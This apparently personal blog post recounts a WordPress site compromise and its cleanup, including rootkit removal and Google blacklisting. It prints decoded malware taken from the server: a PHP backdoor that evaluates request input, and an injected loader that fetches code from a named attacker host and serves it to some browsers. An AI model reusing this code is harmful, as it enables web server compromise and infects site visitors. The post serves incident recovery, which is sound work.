Just a brief update on the security issues at my website mentioned in the last post. As those of you smarter than I am on the mechanisms of these php-injection attacks probably recognized, the measures I took in the last post were not the end of the story. Sure enough, despite thinking that I had ripped enough of the attack code out to end the matter, I found that the next day my site was down again, with the same foreign code reinjected into the WordPress php files. At the risk of boring my readers, but in the hopes of helping anyone in a similar situation, I’ll relate how I solved the problem.

This article was very helpful in helping to expose the backdoor that the attackers left that allowed them to reintroduce the attack (I don’t think they personally did this.  I believe the whole process is just automated).  I scanned my server for rootkits and there were none found.  All the modified files had an owner of www-data which is the unprivileged user that owns all the WordPress files.  So I didn’t think someone had broken into the server though my username and password, or had any root access.  Most likely they got in through an older version of WordPress that had some vulnerability.  When I reinstalled WordPress after the attack, I was copying over old files with new files.  If there was a file that didn’t belong, it would persist with each WordPress update.  I had to find that file.  I did a file diff between a clean WordPress installation and my WordPress.  And there it was.  A file named fetpd.php that was not supposed to be there.  I looked at the file contents.  Definitely a bad guy:

<?php /*4ut|*/eval/*ym’ s3i*/(/*?{G5zM*/base64_decode/*T:%Zb[*/(/*l8d@*/'LyosXFgqL2V2YWwvKl9fPyovKC8qQjFBTyc ... [several lines of the same] … qeX5sICov’/*0[N1puZ8*/)/*U2xKUo.*//*z'pQ^AJ*/)/*OR= Vv*//*E(og*/;/*No,S|*/ ?>

Sneaky programmer put in lots of /*comments*/ to make it look even more confusing.  Using my base64 decoder after removing the comments, I got a similar string!  The attacker had encoded it twice!  Repeating the process I got the following, after removing more comments:

if(isset($_REQUEST['bfbltl']))eval(stripslashes($_REQUEST['bfbltl']));

I’m not an expert, and after looking up the $_REQUEST function on the PHP online help, I am still not completely certain, but I believe this function can grab code from another site, or a cookie at another site, and basically execute it as php code.  So I think this was the cause of the reinfection.  I am still a little disturbed because I don’t know what triggers the running of this code (is there another file somewhere calling fetpd.php?), but at least after I ripped out this little piece of nastiness the site has stayed up.  Take that Russkies!

The battle is still on.  My website went offline unexpectedly this week.  Thanks to the backup guys at Vaultpress who notified me about it.  The site was giving error code 500: “Internal Server Error.”  Oops.  Checking the WordPress files, I found that nearly every php file had this as its first line (enclosed in php tags):

eval(gzinflate(base64_decode(‘dVRtb9s2EP7sAvsPF…[A large number of letters and numbers]…4w+9/’)));

Using this handy decoder, this translates into:

if (!defined(‘frmDs’)){ define(‘frmDs’ ,1); function frm_dl ($url) {
if (function_exists(‘curl_init’)) { $ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else
{$out = file_get_contents($url);} return trim($out); } function
frm_crpt($in){ $il=strlen($in);$o=”; for ($i = 0; $i < $il; $i++)
$o.=$in[$i] ^ ‘*’; return $o; }
function frm_getfrm() { $defframe =

[ I had to exclude some html code here, WordPress doesn't like it]

$codelink = ’http://ghenkdwmk.myfw.us/nc/gnc.php?ver=jquery.latest.js’;
id=”__mceDel”> if (!$codelink){ return $defframe; } $dr=’/var/tmp’; $f =
$dr.’/sess_’.md5(‘frm_frame’); if(!file_exists($f) || time() -
filemtime($f) > 60*5) { $dlc = frm_dl($codelink); if ($dlc){ if ($fp =
@fopen($f, ‘w’)){ fwrite($fp, frm_crpt($dlc)); fclose($fp); } else
return $dlc; } else @unlink($f); } $fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):$defframe; } $ua =
$_SERVER['HTTP_USER_AGENT']; if (preg_match(‘/Windows/’, $ua) &&
preg_match(‘/MSIE|Opera/’, $ua) ){ error_reporting(0);
if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
@setcookie(‘__utmfr’,rand(1,1000),time()+86400*7,’/'); print($nfc); }
}}

After manually deleting this evil first line from the many infected php scripts, I thought I was making progress.  Everything cleaned up and … Bang!  The lines were back again!  I decided to look a little more closely at the php code.  Clearly there was some file that was doing all this code injection and I hadn’t deleted it.  The answer was in this code:

if (!$codelink){ return $defframe; } $dr='/var/tmp'; $f =
$dr.'/sess_'.md5('frm_frame'); if(!file_exists($f) || time() -

The code downloads a file and places it in the /var/tmp directory.  The file name starts with ‘sess_’ followed by a meaningless number.  Looking in /var/tmp, lo and behold, it was there, a binary file that clearly was the evildoer.  I deleted it and waited.  After a few minutes it was back, reconstituted by the scripts in the WordPress php files.  I deleted it again, used chmod to set the permissions of /var/tmp to 444 (read-only by everyone, even the owner – ha!), and went about deleting all the first lines of each infected file again.  Turns out the website still didn’t work.  Examining the error logs showed that the stupid virus or trojan or whatever you’d call it had corrupted one of the php files.  I downloaded the WordPress package, copied the good file over the bad file and, — ta-da! — website is up and running (so far).  Now to the perps.  In the code above is the website of the bad guys: ghenkdwmk.myfw.us.  Whatever that’s supposed to mean. Pinging them (I wouldn’t advise visiting their site) gave a response, and an IP address of 151.248.123.170.  Traceroute led right to a bunch of servers in Russia (http://ovzhost60.vps.reg.ru/) .  A web ip tracer gave this map.

Where the bad guys are.

Must be a boring place to live.

Satellite imagery confirms that yes, this is the middle of nowhere (Siberia maybe?).  So, I guess they’ve got nothing better to do in this part of Russia than mess up other people’s  websites .  Losers.  I’ve got my eye on you…

Uh oh…

Saturday morning I was in the ideal programming groove.  I got up early, grabbed a coffee from Panera’s, and faced the screen of my main computer, SuperSluggo, with its Ubuntu desktop and a nice wallpaper showing a snowy scene.  I had cleaned the condo (oops, I mean EP Studios Eastern HQ) a few days before.  I really had no other distracting tasks I needed to do.  The weekend, full of promise and seemingly endless at this hour of 8 in the morning, stretched before me.  I had just read that the FDA had approved the anticoagulant apixaban for use in non-valvular atrial fibrillation.  I downloaded the monograph from Pfizer on dosing of the drug and found that it actually had a fairly complex dosing scheme, depending not just on creatinine clearance, but also on a combination of age, weight, and serum creatinine.  It was clear that EP Mobile, my mobile app for electrophysiology that includes several drug dose calculators, needed an apixaban calculator.

This was fairly easy to implement, and before long I had the Android version ready to go.  I clicked on the EP Studios software site (epstudiossoftware.com) to add the apixaban reference to the References page of the site.  And there appeared, instead of the site, a garish red ATTACK SITE — EXTREME DANGER — GET THE #@% OUT OF HERE! page.

My sweet and innocent web site, residing in the innards of my web server computer, TomServo, on the floor of the guest room, had been hacked!  But how?  I had a tough password.  My router only lets stuff through the HTTP port 80 to TomServo.  There must have been some mistake.

I clicked through the GET ME OUT OF HERE warnings to the actual web page.  Looked normal, except for a red bar at the top with the GET ME OUT OF HERE button and a THIS IS NOT A MALICIOUS SITE button.  I clicked through the latter button, got to the Google Web Tools site and read the details.  Since December 27, my web server had been serving malicious pages to people who visited the site.  My site was infected with malware.  My site was blacklisted by Google.  It would no longer show up on web searches.  Anyone clicking on the site would be greeted by the same red warning page I had seen.  This was not good.

I had to fix this and get un-blacklisted.  I read the steps I needed to take.  They were extreme.  They were the sort of thing that would probably take most of the day to accomplish.  So much for my infinite weekend.

I got to work.  I took TomServo offline by unplugging the ethernet cable.  There, take that, hackers!  Next I hooked up a keyboard and monitor and tried to see what was going on.  I ran a utility I had previously installed that checks for rootkits.  A rootkit is a program that takes over your computer and then hides itself so that it is very hard to detect.  An example of how it hides itself would be to substitute its own ls (which lists files and directories) for the original ls program.  The new ls would act exactly like the old, but wouldn’t ever list programs that were part of the rootkit.  Well I ran chkrootkit and, lo and behold, it found that my server was infected with the SUCKIT rootkit.

How to get rid of a rootkit?  Unfortunately the only sure way is to erase the hard drive and reinstall the operating system.  Fortunately my WordPress blog (and the entire site) was backed up by a WordPress service named VaultPress, so my data was secure.  Taking a deep breath, I crossed the Rubicon.  I erased the drive and reinstalled Ubuntu Server 12.10 from a CD.

I went back online.  I then download WordPress and installed it.  There was a bunch of tweaking that needed to be redone, and, unfortunately, I had forgotten a lot of stuff, like how to set up my mail server.  After fumbling around I seemed to have everything working, including a new, fresh, blank WordPress installation.

Now to restore a backup from VaultPress.  I tried to do it automatically.  It didn’t work.  I ended up downloading the files manually and copying them into the proper folders.  Worked!  I had a running version of my web site that was indistinguishable from the old.

I thought I was done.  I went to the Google Web Tools site, declared “This house is clean!” and hoped they would quickly review my site and un-blacklist it.  I went to bed that night hoping the crisis had passed.

The next day I was still getting the red screen of shame when I accessed my site.  I checked the Google Web Tools.  They had rechecked my site, and it was still infected!

I reran the chkrootkit program.  Everything was clean.  Maybe Google was full of it.  Everything was new on the server, and I had changed all the passwords.  Well, not everything was new.

I realized the backup copy of the blog itself might be infected.  I logged into the administration page and searched for some plugins that could detect malware on a WordPress site.  I downloaded one and ran it.  Bingo!  Some files residing in the theme directory of WordPress contained some JavaScript that shouldn’t have been there.  I copied these files over using the fresh version of WordPress I had downloaded the day before.  I reran the malware detector.  Everything was clean!

I appealed again to Google to recheck my site.  Within a few hours, the site was declared clean by Google.  The red page was gone.  I’m not sure how long it will be before my site’s pages will show up on the Google search engine without the malware warnings appended to them.

Breathing a sigh of relief, I went on to finish my upgrading of EP Mobile for both the Android and Apple versions.  I am now much more paranoid about the possibility of exploitation of my web site, and will keep a closer eye on it.  This was not a pleasant experience for me.